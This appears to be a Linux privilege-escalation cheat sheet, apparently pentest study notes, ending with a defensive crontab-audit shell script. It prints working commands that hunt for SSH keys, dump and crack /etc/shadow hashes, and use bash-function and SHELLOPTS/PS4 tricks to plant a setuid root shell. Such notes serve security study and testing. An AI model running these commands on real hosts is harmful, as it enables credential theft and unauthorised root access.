Linux Privilege Escalation

Kernel Exploits

Dirty COW

Stored Keys & Passwords

  • History
  • Environment Variables
  • Config + Dot Files
  • SSH keys
find / -type f \( -name "authorized_keys" -o -name "id_rsa" \) 2>/dev/null

Permissions

  • Weak permissions
  • Umask
  • Unshadow via unshadow /etc/passwd /etc/shadow > unshadow.txt, then crack with john or hashcat.
    • e.g. john --wordlist=./wordlist --format=crypt hash
  • SUID
    • list
    find / -perm /6000 -ls 2>/dev/null
    
  • User specific files
find / -user root -name "*.txt"

Sudo Binary

PATH Hijacking

  • Interpositioning binaries via PATH
    • Look for binaries used in other bins and scripts
    • Interpose a binary of the same name and put its directory at the front of $PATH

Bash function

  • Interpositioning of binaries via bash functions
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /path/to/binary
  • Call the binary that invokes this function

Environment Variable

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'

Capabilities

Crontab

  • Check cat /etc/crontab
  • Check writable scripts and binaries that are scheduled
  • Check $PATH order
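
The three crontab checks above, written as a defender-side audit (an added example, not part of the original page). It assumes GNU find and the system-crontab line format with a user field; the function names and finding labels are made up for this example.

```shell
#!/bin/sh
# Audit a system crontab: prints one finding per line,
# returns 0 when clean and 1 when anything was found.

# True if the path is writable by group or others. Uses permission bits
# only, so the result does not depend on who runs the audit. -L follows
# symlinks such as /bin -> usr/bin.
loose_perms() {
    [ -n "$(find -L "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]
}

audit_crontab() {
    crontab_file=$1
    findings=0

    # PATH order: every directory cron searches must be absolute and
    # not writable by group/others, earliest entries matter most.
    cron_path=$(sed -n 's/^PATH=//p' "$crontab_file" | tail -n 1)
    old_ifs=$IFS; IFS=:
    for dir in $cron_path; do
        case $dir in
            /*) if loose_perms "$dir"; then
                    echo "PATH_DIR_WRITABLE $dir"; findings=1
                fi ;;
            *)  echo "PATH_DIR_RELATIVE '$dir'"; findings=1 ;;
        esac
    done
    IFS=$old_ifs

    # Scheduled jobs: m h dom mon dow user command [args...]
    while read -r m h dom mon dow user cmd rest; do
        case $m in
            ''|\#*|*=*) continue ;;          # blank, comment, VAR=value
            @*) user=$h; cmd=$dom ;;         # @reboot user command
        esac
        case $cmd in
            /*) if loose_perms "$cmd"; then
                    echo "JOB_TARGET_WRITABLE $user $cmd"; findings=1
                fi ;;
            *)  echo "JOB_RELIES_ON_PATH $user $cmd"; findings=1 ;;
        esac
    done < "$crontab_file"

    return $findings
}
```

Run it as audit_crontab /etc/crontab; each finding is a file or directory whose mode or ownership should be tightened, or a job that should call its target by absolute path.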

NFS Rootsquash